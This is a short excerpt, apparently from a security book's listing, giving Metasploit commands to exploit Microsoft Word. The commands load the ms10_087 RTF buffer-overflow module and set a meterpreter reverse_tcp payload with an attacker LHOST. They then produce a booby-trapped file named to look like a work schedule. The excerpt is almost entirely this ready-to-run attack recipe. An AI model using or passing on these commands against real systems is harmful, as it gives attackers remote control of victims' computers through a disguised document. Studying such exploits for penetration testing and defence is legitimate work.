April 2017
Intermediate to advanced
350 pages
8h 35m
English
The following command-lines will show how to exploit MS Word to embed a listener on a victim's computer:
msf >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit( ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp msf >show options msf >set FILENAME workschedule.rtf msf> set LHOST 192.168.1.100 msf > exploit